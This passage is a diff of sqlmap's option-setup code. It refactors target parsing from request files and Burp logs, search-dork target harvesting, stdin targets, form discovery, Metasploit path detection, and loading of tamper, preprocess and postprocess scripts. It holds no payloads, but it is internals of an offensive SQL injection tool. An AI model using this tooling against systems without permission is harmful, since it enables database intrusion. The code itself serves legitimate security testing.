re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(GET|POST).*?\sHTTP\/", request, re.I | re.M): - continue - - if re.search(r"^[\n]*(GET|POST).*?\.(%s)\sHTTP\/" % "|".join(CRAWL_EXCLUDE_EXTENSIONS), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - - for line in lines: - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - if len(line) == 0: - if method == HTTPMETHOD.POST and data is None: - data = "" - params = True - - elif (line.startswith("GET ") or line.startswith("POST ")) and " HTTP/" in line: - if line.startswith("GET "): - index = 4 - else: - index = 5 - - url = line[index:line.index(" HTTP/")] - method = line[:index - 1] - - if "?" in line and "=" in line: - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+: ", line): - key, value = line.split(": ", 1) - - # Cookie and Host headers - if key.upper() == HTTPHEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTPHEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # conf.httpHeaders and consider the following lines as - # POSTed data - if key.upper() == HTTPHEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTPHEADER.PROXY_CONNECTION, HTTPHEADER.CONNECTION): - conf.httpHeaders.append((getUnicode(key), getUnicode(value))) - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, data, cookie)) - addedTargetUrls.add(url) - - fp = openFile(reqFile, "rb") - - content = fp.read() - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) +# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html +try: + WindowsError +except NameError: + WindowsError = None def _loadQueries(): """ @@ -372,7 +205,13 @@ def __contains__(self, name): return retVal tree = ElementTree() - tree.parse(paths.QUERIES_XML) + try: + tree.parse(paths.QUERIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) for node in tree.findall("*"): queries[node.attrib['value']] = iterate(node) @@ -384,7 +223,7 @@ def _setMultipleTargets(): """ initialTargetsCount = len(kb.targets) - addedTargetUrls = set() + seen = set() if not conf.logFile: return @@ -396,18 +235,28 @@ def _setMultipleTargets(): errMsg = "the specified list of targets does not exist" raise SqlmapFilePathException(errMsg) - if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) + if checkFile(conf.logFile, False): + for target in parseRequestFile(conf.logFile): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) elif os.path.isdir(conf.logFile): files = os.listdir(conf.logFile) files.sort() for reqFile in files: - if not re.search("([\d]+)\-request", reqFile): + if not re.search(r"([\d]+)\-request", reqFile): continue - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) + for target in parseRequestFile(os.path.join(conf.logFile, reqFile)): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) else: errMsg = "the specified list of targets is not a file " @@ -418,7 +267,8 @@ def _setMultipleTargets(): if updatedTargetsCount > initialTargetsCount: infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) - infoMsg += "testable requests from the targets list" + infoMsg += "(parameter unique) requests from the " + infoMsg += "targets list ready to be tested" logger.info(infoMsg) def _adjustLoggingFormatter(): @@ -431,11 +281,12 @@ def _adjustLoggingFormatter(): return def format(record): - _ = boldifyMessage(FORMATTER._format(record)) - if kb.prependFlag: - _ = "\n%s" % _ + message = FORMATTER._format(record) + message = boldifyMessage(message) + if kb.get("prependFlag"): + message = "\n%s" % message kb.prependFlag = False - return _ + return message FORMATTER._format = FORMATTER.format FORMATTER.format = format @@ -446,82 +297,92 @@ def _setRequestFromFile(): textual file, parses it and saves the information into the knowledge base. """ - if not conf.requestFile: - return + if conf.requestFile: + for requestFile in re.split(PARAMETER_SPLITTING_REGEX, conf.requestFile): + requestFile = safeExpandUser(requestFile) + url = None + seen = set() - addedTargetUrls = set() + if not checkFile(requestFile, False): + errMsg = "specified HTTP request file '%s' " % requestFile + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - conf.requestFile = os.path.expanduser(conf.requestFile) + infoMsg = "parsing HTTP request from '%s'" % requestFile + logger.info(infoMsg) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) + for target in parseRequestFile(requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + if len(kb.targets) > 1: + conf.multipleTargets = True + seen.add(url) + + if url is None: + errMsg = "specified file '%s' " % requestFile + errMsg += "does not contain a usable HTTP request (with parameters)" + raise SqlmapDataException(errMsg) + + if conf.secondReq: + conf.secondReq = safeExpandUser(conf.secondReq) + + if not checkFile(conf.secondReq, False): + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not exist" + raise SqlmapFilePathException(errMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " - errMsg += "does not exist" - raise SqlmapFilePathException(errMsg) + infoMsg = "parsing second-order HTTP request from '%s'" % conf.secondReq + logger.info(infoMsg) - _feedTargetsDict(conf.requestFile, addedTargetUrls) + try: + target = next(parseRequestFile(conf.secondReq, False)) + kb.secondReq = target + except StopIteration: + errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq + errMsg += "does not contain a valid HTTP request" + raise SqlmapDataException(errMsg) def _setCrawler(): if not conf.crawlDepth: return - crawl(conf.url) + if not conf.bulkFile: + if conf.url: + crawl(conf.url) + elif conf.requestFile and kb.targets: + target = next(iter(kb.targets)) + crawl(target[0], target[2], target[3]) -def _setGoogleDorking(): +def _doSearch(): """ - This function checks if the way to request testable hosts is through - Google dorking then requests to Google the search parameter, parses - the results and save the testable hosts into the knowledge base. + This function performs search dorking, parses results + and saves the testable hosts into the knowledge base. """ if not conf.googleDork: return - global keepAliveHandler - global proxyHandler - - debugMsg = "initializing Google dorking requests" - logger.debug(debugMsg) - - infoMsg = "first request to Google to get the session cookie" - logger.info(infoMsg) - - handlers = [proxyHandler] - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - if conf.proxy: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - googleObj = Google(handlers) kb.data.onlyGETs = None def retrieve(): - links = googleObj.search(conf.googleDork) + links = search(conf.googleDork) if not links: errMsg = "unable to find results for your " - errMsg += "Google dork expression" + errMsg += "search dork expression" raise SqlmapGenericException(errMsg) for link in links: link = urldecode(link) - if re.search(r"(.*?)\?(.+)", link): - kb.targets.add((link, conf.method, conf.data, conf.cookie)) + if re.search(r"(.*?)\?(.+)", link) or conf.forms: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) elif re.search(URI_INJECTABLE_REGEX, link, re.I): - if kb.data.onlyGETs is None and conf.data is None: + if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: message = "do you want to scan only results containing GET parameters? [Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' - if not kb.data.onlyGETs: - kb.targets.add((link, conf.method, conf.data, conf.cookie)) + kb.data.onlyGETs = readInput(message, default='Y', boolean=True) + if not kb.data.onlyGETs or conf.googleDork: + kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) return links @@ -529,47 +390,97 @@ def retrieve(): links = retrieve() if kb.targets: - infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "Google dork expression, " + infoMsg = "found %d results for your " % len(links) + infoMsg += "search dork expression" - if len(links) == len(kb.targets): - infoMsg += "all " - else: - infoMsg += "%d " % len(kb.targets) + if not conf.forms: + infoMsg += ", " + + if len(links) == len(kb.targets): + infoMsg += "all " + else: + infoMsg += "%d " % len(kb.targets) + + infoMsg += "of them are testable targets" - infoMsg += "of them are testable targets" logger.info(infoMsg) break else: - message = "sqlmap got %d results " % len(links) - message += "for your Google dork expression, but none of them " + message = "found %d results " % len(links) + message += "for your search dork expression, but none of them " message += "have GET parameters to test for SQL injection. " message += "Do you want to skip to the next result page? [Y/n]" - test = readInput(message, default="Y") - if test[0] in ("n", "N"): + if not readInput(message, default='Y', boolean=True): raise SqlmapSilentQuitException else: conf.googlePage += 1 +def _setStdinPipeTargets(): + if conf.url: + return + + if isinstance(conf.stdinPipe, _collections.Iterable): + infoMsg = "using 'STDIN' for parsing targets list" + logger.info(infoMsg) + + class _(object): + def __init__(self): + self.__rest = OrderedSet() + + def __iter__(self): + return self + + def __next__(self): + return self.next() + + def next(self): + try: + line = next(conf.stdinPipe) + except (IOError, OSError, TypeError, UnicodeDecodeError): + line = None + + if line: + match = re.search(r"\b(https?://[^\s'\"]+|[\w.]+\.\w{2,3}[/\w+]*\?[^\s'\"]+)", line, re.I) + if match: + return (match.group(0), conf.method, conf.data, conf.cookie, None) + elif self.__rest: + return self.__rest.pop() + + raise StopIteration() + + def add(self, elem): + self.__rest.add(elem) + + kb.targets = _() + def _setBulkMultipleTargets(): if not conf.bulkFile: return - conf.bulkFile = os.path.expanduser(conf.bulkFile) + conf.bulkFile = safeExpandUser(conf.bulkFile) infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile logger.info(infoMsg) - if not os.path.isfile(conf.bulkFile): + if not checkFile(conf.bulkFile, False): errMsg = "the specified bulk file " errMsg += "does not exist" raise SqlmapFilePathException(errMsg) + found = False for line in getFileItems(conf.bulkFile): - if re.search(r"[^ ]+\?(.+)", line, re.I): - kb.targets.add((line.strip(), None, None, None)) + if conf.scope and not re.search(conf.scope, line, re.I): + continue + + if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line or conf.data: + found = True + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) + + if not found and not conf.forms and not conf.crawlDepth: + warnMsg = "no usable links found (with GET parameters)" + logger.warning(warnMsg) def _findPageForms(): if not conf.forms or conf.crawlDepth: @@ -578,27 +489,47 @@ def _findPageForms(): if conf.url and not checkConnection(): return + found = False infoMsg = "searching for forms" logger.info(infoMsg) - if not conf.bulkFile: - page, _ = Request.queryPage(content=True) - findPageForms(page, conf.url, True, True) + if not any((conf.bulkFile, conf.googleDork)): + page, _, _ = Request.queryPage(content=True, ignoreSecondOrder=True) + if findPageForms(page, conf.url, True, True): + found = True else: - targets = getFileItems(conf.bulkFile) + if conf.bulkFile: + targets = getFileItems(conf.bulkFile) + elif conf.googleDork: + targets = [_[0] for _ in kb.targets] + kb.targets.clear() + else: + targets = [] + for i in xrange(len(targets)): try: - target = targets[i] - page, _, _ = Request.getPage(url=target.strip(), crawling=True, raise404=False) - findPageForms(page, target, False, True) + target = targets[i].strip() + + if not re.search(r"(?i)\Ahttp[s]*://", target): + target = "http://%s" % target + + page, _, _ = Request.getPage(url=target.strip(), cookie=conf.cookie, crawling=True, raise404=False) + if findPageForms(page, target, False, True): + found = True if conf.verbose in (1, 2): status = '%d/%d links visited (%d%%)' % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) - except Exception, ex: - errMsg = "problem occured while searching for forms at '%s' ('%s')" % (target, ex) + except KeyboardInterrupt: + break + except Exception as ex: + errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) + if not found: + warnMsg = "no forms found" + logger.warning(warnMsg) + def _setDBMSAuthentication(): """ Check and set the DBMS authentication credentials to run statements as @@ -611,7 +542,7 @@ def _setDBMSAuthentication(): debugMsg = "setting the DBMS authentication credentials" logger.debug(debugMsg) - match = re.search("^(.+?):(.*?)$", conf.dbmsCred) + match = re.search(r"^(.+?):(.*?)$", conf.dbmsCred) if not match: errMsg = "DBMS authentication credentials value must be in format " @@ -631,23 +562,20 @@ def _setMetasploit(): msfEnvPathExists = False if IS_WIN: - if not conf.msfPath: - def _(key, value): - retVal = None - - try: - from _winreg import ConnectRegistry, OpenKey, QueryValueEx, HKEY_LOCAL_MACHINE - _ = ConnectRegistry(None, HKEY_LOCAL_MACHINE) - _ = OpenKey(_, key) - retVal = QueryValueEx(_, value)[0] - except: - logger.debug("unable to identify Metasploit installation path via registry key") - - return retVal + try: + __import__("win32file") + except ImportError: + errMsg = "sqlmap requires third-party module 'pywin32' " + errMsg += "in order to use Metasploit functionalities on " + errMsg += "Windows. You can download it from " + errMsg += "'https://github.com/mhammond/pywin32'" + raise SqlmapMissingDependence(errMsg) - conf.msfPath = _(r"SOFTWARE\Rapid7\Metasploit", "Location") - if conf.msfPath: - conf.msfPath = os.path.join(conf.msfPath, "msf3") + if not conf.msfPath: + for candidate in os.environ.get("PATH", "").split(';'): + if all(_ in candidate for _ in ("metasploit", "bin")): + conf.msfPath = os.path.dirname(candidate.rstrip('\\')) + break if conf.osSmb: isAdmin = runningAsAdmin() @@ -661,8 +589,15 @@ def _(key, value): if conf.msfPath: for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")): - if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")): + if any(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True + if all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(path, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False + conf.msfPath = path break @@ -677,54 +612,62 @@ def _(key, value): warnMsg += "or more of the needed Metasploit executables " warnMsg += "within msfcli, msfconsole, msfencode and " warnMsg += "msfpayload do not exist" - logger.warn(warnMsg) + logger.warning(warnMsg) else: warnMsg = "you did not provide the local path where Metasploit " warnMsg += "Framework is installed" - logger.warn(warnMsg) + logger.warning(warnMsg) if not msfEnvPathExists: warnMsg = "sqlmap is going to look for Metasploit Framework " warnMsg += "installation inside the environment path(s)" - logger.warn(warnMsg) + logger.warning(warnMsg) envPaths = os.environ.get("PATH", "").split(";" if IS_WIN else ":") for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")): - infoMsg = "Metasploit Framework has been found " - infoMsg += "installed in the '%s' path" % envPath - logger.info(infoMsg) - + if any(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True - conf.msfPath = envPath + if all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfvenom",)): + kb.oldMsf = False + elif all(os.path.exists(normalizePath(os.path.join(envPath, "%s%s" % (_, ".bat" if IS_WIN else "")))) for _ in ("msfencode", "msfpayload")): + kb.oldMsf = True + else: + msfEnvPathExists = False - break + if msfEnvPathExists: + infoMsg = "Metasploit Framework has been found " + infoMsg += "installed in the '%s' path" % envPath + logger.info(infoMsg) + + conf.msfPath = envPath + + break if not msfEnvPathExists: errMsg = "unable to locate Metasploit Framework installation. " - errMsg += "You can get it at 'http://www.metasploit.com/download/'" + errMsg += "You can get it at 'https://www.metasploit.com/download/'" raise SqlmapFilePathException(errMsg) def _setWriteFile(): - if not conf.wFile: + if not conf.fileWrite: return debugMsg = "setting the write file functionality" logger.debug(debugMsg) - if not os.path.exists(conf.wFile): - errMsg = "the provided local file '%s' does not exist" % conf.wFile + if not os.path.exists(conf.fileWrite): + errMsg = "the provided local file '%s' does not exist" % conf.fileWrite raise SqlmapFilePathException(errMsg) - if not conf.dFile: + if not conf.fileDest: errMsg = "you did not provide the back-end DBMS absolute path " - errMsg += "where you want to write the local file '%s'" % conf.wFile + errMsg += "where you want to write the local file '%s'" % conf.fileWrite raise SqlmapMissingMandatoryOptionException(errMsg) - conf.wFileType = getFileType(conf.wFile) + conf.fileWriteType = getFileType(conf.fileWrite) def _setOS(): """ @@ -753,10 +696,10 @@ def _setTechnique(): validTechniques = sorted(getPublicTypeMembers(PAYLOAD.TECHNIQUE), key=lambda x: x[1]) validLetters = [_[0][0].upper() for _ in validTechniques] - if conf.tech and isinstance(conf.tech, basestring): + if conf.technique and isinstance(conf.technique, six.string_types): _ = [] - for letter in conf.tech.upper(): + for letter in conf.technique.upper(): if letter not in validLetters: errMsg = "value for --technique must be a string composed " errMsg += "by the letters %s. Refer to the " % ", ".join(validLetters) @@ -768,7 +711,7 @@ def _setTechnique(): _.append(validInt) break - conf.tech = _ + conf.technique = _ def _setDBMS(): """ @@ -782,7 +725,7 @@ def _setDBMS(): logger.debug(debugMsg) conf.dbms = conf.dbms.lower() - regex = re.search("%s ([\d\.]+)" % ("(%s)" % "|".join([alias for alias in SUPPORTED_DBMS])), conf.dbms, re.I) + regex = re.search(r"%s ([\d\.]+)" % ("(%s)" % "|".join(SUPPORTED_DBMS)), conf.dbms, re.I) if regex: conf.dbms = regex.group(1) @@ -790,19 +733,33 @@ def _setDBMS(): if conf.dbms not in SUPPORTED_DBMS: errMsg = "you provided an unsupported back-end database management " - errMsg += "system. The supported DBMS are %s. " % ', '.join([d for d in DBMS_DICT]) + errMsg += "system. Supported DBMSes are as follows: %s. " % ', '.join(sorted((_ for _ in (list(DBMS_DICT) + getPublicTypeMembers(FORK, True))), key=str.lower)) errMsg += "If you do not know the back-end DBMS, do not provide " errMsg += "it and sqlmap will fingerprint it for you." raise SqlmapUnsupportedDBMSException(errMsg) - for aliases in (MSSQL_ALIASES, MYSQL_ALIASES, PGSQL_ALIASES, ORACLE_ALIASES, \ - SQLITE_ALIASES, ACCESS_ALIASES, FIREBIRD_ALIASES, \ - MAXDB_ALIASES, SYBASE_ALIASES, DB2_ALIASES): + for dbms, aliases in DBMS_ALIASES: if conf.dbms in aliases: - conf.dbms = aliases[0] + conf.dbms = dbms break +def _listTamperingFunctions(): + """ + Lists available tamper functions + """ + + if conf.listTampers: + infoMsg = "listing available tamper scripts\n" + logger.info(infoMsg) + + for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))): + content = openFile(script, 'r').read() + match = re.search(r'(?s)__priority__.+"""(.+)"""', content) + if match: + comment = match.group(1).strip() + dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip()))) + def _setTamperingFunctions(): """ Loads tampering functions from given script(s) @@ -814,32 +771,37 @@ def _setTamperingFunctions(): resolve_priorities = False priorities = [] - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): found = False - tfile = tfile.strip() + path = safeFilepathEncode(paths.SQLMAP_TAMPER_PATH) + script = safeFilepathEncode(script.strip()) - if not tfile: - continue + try: + if not script: + continue - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) + elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)): + script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script) - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) + elif not os.path.exists(script): + errMsg = "tamper script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile + elif not script.endswith(".py"): + errMsg = "tamper script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--tamper'" raise SqlmapSyntaxException(errMsg) - dirname, filename = os.path.split(tfile) + dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) - infoMsg = "loading tamper script '%s'" % filename[:-3] + infoMsg = "loading tamper module '%s'" % filename[:-3] logger.info(infoMsg) - if not os.path.exists(os.path.join(dirname, '__init__.py')): + if not os.path.exists(os.path.join(dirname, "__init__.py")): errMsg = "make sure that there is an empty file '__init__.py' " errMsg += "inside of tamper scripts directory '%s'" % dirname raise SqlmapGenericException(errMsg) @@ -848,30 +810,31 @@ def _setTamperingFunctions(): sys.path.insert(0, dirname) try: - module = __import__(filename[:-3]) - except ImportError, msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ + priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ + priority = priority if priority is not None else PRIORITY.LOWEST for name, function in inspect.getmembers(module, inspect.isfunction): - if name == "tamper": + if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"): found = True kb.tamperFunctions.append(function) - function.func_name = module.__name__ + function.__name__ = module.__name__ if check_priority and priority > last_priority: - message = "it seems that you might have mixed " + message = "it appears that you might have mixed " message += "the order of tamper scripts. " message += "Do you want to auto resolve this? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): + if choice == 'N': resolve_priorities = False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException + else: + resolve_priorities = True check_priority = False @@ -880,20 +843,188 @@ def _setTamperingFunctions(): break elif name == "dependencies": - function() + try: + function() + except Exception as ex: + errMsg = "error occurred while checking dependencies " + errMsg += "for tamper module '%s' ('%s')" % (getUnicode(filename[:-3]), getSafeExString(ex)) + raise SqlmapGenericException(errMsg) if not found: - errMsg = "missing function 'tamper(payload, headers)' " - errMsg += "in tamper script '%s'" % tfile + errMsg = "missing function 'tamper(payload, **kwargs)' " + errMsg += "in tamper script '%s'" % script raise SqlmapGenericException(errMsg) + if kb.tamperFunctions and len(kb.tamperFunctions) > 3: + warnMsg = "using too many tamper scripts is usually not " + warnMsg += "a good idea" + logger.warning(warnMsg) + if resolve_priorities and priorities: - priorities.sort(reverse=True) + priorities.sort(key=functools.cmp_to_key(lambda a, b: cmp(a[0], b[0])), reverse=True) kb.tamperFunctions = [] for _, function in priorities: kb.tamperFunctions.append(function) +def _setPreprocessFunctions(): + """ + Loads preprocess function(s) from given script(s) + """ + + if conf.preprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.preprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "preprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "preprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--preprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading preprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of preprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import preprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + try: + if name == "preprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("req",)): + found = True + + kb.preprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + except ValueError: # Note: https://github.com/sqlmapproject/sqlmap/issues/4357 + pass + + if not found: + errMsg = "missing function 'preprocess(req)' " + errMsg += "in preprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + function(_urllib.request.Request("http://localhost")) + except Exception as ex: + tbMsg = traceback.format_exc() + + if conf.debug: + dataToStdout(tbMsg) + + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+").write("#!/usr/bin/env\n\ndef preprocess(req):\n pass\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+").write("pass") + + errMsg = "function 'preprocess(req)' " + errMsg += "in preprocess script '%s' " % script + errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex) + errMsg += "You can find a template script at '%s'" % filename + raise SqlmapGenericException(errMsg) + +def _setPostprocessFunctions(): + """ + Loads postprocess function(s) from given script(s) + """ + + if conf.postprocess: + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.postprocess): + found = False + function = None + + script = safeFilepathEncode(script.strip()) + + try: + if not script: + continue + + if not os.path.exists(script): + errMsg = "postprocess script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) + + elif not script.endswith(".py"): + errMsg = "postprocess script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--postprocess'" + raise SqlmapSyntaxException(errMsg) + + dirname, filename = os.path.split(script) + dirname = os.path.abspath(dirname) + + infoMsg = "loading postprocess module '%s'" % filename[:-3] + logger.info(infoMsg) + + if not os.path.exists(os.path.join(dirname, "__init__.py")): + errMsg = "make sure that there is an empty file '__init__.py' " + errMsg += "inside of postprocess scripts directory '%s'" % dirname + raise SqlmapGenericException(errMsg) + + if dirname not in sys.path: + sys.path.insert(0, dirname) + + try: + module = __import__(safeFilepathEncode(filename[:-3])) + except Exception as ex: + raise SqlmapSyntaxException("cannot import postprocess module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex))) + + for name, function in inspect.getmembers(module, inspect.isfunction): + if name == "postprocess" and inspect.getargspec(function).args and all(_ in inspect.getargspec(function).args for _ in ("page", "headers", "code")): + found = True + + kb.postprocessFunctions.append(function) + function.__name__ = module.__name__ + + break + + if not found: + errMsg = "missing function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s'" % script + raise SqlmapGenericException(errMsg) + else: + try: + _, _, _ = function("", {}, None) + except: + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.PREPROCESS, suffix=".py") + os.close(handle) + + openFile(filename, "w+").write("#!/usr/bin/env\n\ndef postprocess(page, headers=None, code=None):\n return page, headers, code\n") + openFile(os.path.join(os.path.dirname(filename), "__init__.py"), "w+").write("pass") + + errMsg = "function 'postprocess(page, headers=None, code=None)' " + errMsg += "in postprocess script '%s' " % script + errMsg += "should return a tuple '(page, headers, code)' " + errMsg += "(Note: find template script at '%s')" % filename + raise SqlmapGenericException(errMsg) + def _setThreads(): if not isinstance(conf.threads, int) or conf.threads <= 0: conf.threads = 1 @@ -904,90 +1035,282 @@ def _setDNSCache(): """ def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] + key = (args, frozenset(kwargs.items())) - else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] + if key in kb.cache.addrinfo: + return kb.cache.addrinfo[key] - if not hasattr(socket, '_getaddrinfo'): + kb.cache.addrinfo[key] = socket._getaddrinfo(*args, **kwargs) + return kb.cache.addrinfo[key] + + if not hasattr(socket, "_getaddrinfo"): socket._getaddrinfo = socket.getaddrinfo socket.getaddrinfo = _getaddrinfo -def _setHTTPProxy(): +def _setSocketPreConnect(): """ - Check and set the HTTP proxy to pass by all HTTP requests. + Makes a pre-connect 